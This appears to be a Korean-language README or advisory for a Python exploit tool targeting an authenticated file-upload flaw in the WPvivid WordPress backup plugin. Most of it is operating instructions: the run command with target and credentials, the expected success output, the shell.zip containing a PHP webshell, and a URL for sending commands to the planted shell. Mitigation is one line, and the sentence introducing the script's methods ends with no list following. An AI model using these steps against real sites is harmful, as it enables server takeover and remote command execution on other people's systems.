
게시일: 2024-10-16 | 마이그레이션, 백업, 스테이징 – WPvivid <= 0.9.35 - 인증된 (Subscriber+) 임의 파일 업로드
사이트 마이그레이션 및 백업을 위해 설계된 WPvivid WordPress 플러그인은 임의 파일 업로드 결함에 취약합니다. 이 취약점을 통해 낮은 권한의 인증된 사용자가 ZIP 파일을 업로드하고 추출할 수 있으며, 추출된 파일 내에 악성 스크립트가 배포될 경우 원격 코드 실행(RCE)으로 이어질 수 있습니다.
Python 익스플로잇 스크립트가 다음 방법을 사용하여 이 취약점을 악용하도록 제작되었습니다:
익스플로잇이 성공하면 스크립트는 다음을 출력합니다:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
악성 shell.zip 파일이 익스플로잇 스크립트와 동일한 디렉토리에 존재하는지 확인하십시오.
shell.zip 파일에는 PHP 웹쉘 (예: nxploit.php)이 포함되어야 합니다.
구독자 이상의 권한을 가진 유효한 WordPress 계정이 필요합니다.
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
스크립트는 대상 버전을 확인하고 제공된 자격 증명을 사용하여 로그인합니다.
대상이 취약한 경우 스크립트는 shell.zip을 업로드하고 추출합니다.
성공하면 스크립트는 업로드된 쉘의 URL을 제공합니다.
쉘이 성공적으로 업로드되고 추출되면 URL을 통해 명령을 전송하여 상호 작용할 수 있습니다:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
이 취약점을 완화하려면 다음을 강력히 권장합니다:
.htaccess 또는 서버 구성을 사용하여 wp-content/uploads 디렉토리에서 직접 스크립트 실행을 비활성화하십시오.이 취약점은 인증된 공격자가 WordPress 서버에 악성 파일을 업로드하고 실행할 수 있게 하므로 심각한 위험을 제기합니다. 사이트 관리자는 설치를 보호하기 위해 즉시 조치를 취해야 합니다.
면책 조항: 이 문서는 윤리적인 보안 연구 및 교육 목적으로만 제공됩니다. 허가 없이 취약점을 악용하는 것은 불법이며 관련 법률에 따라 처벌받을 수 있습니다. ( Nxploit | Khaled_alenazi )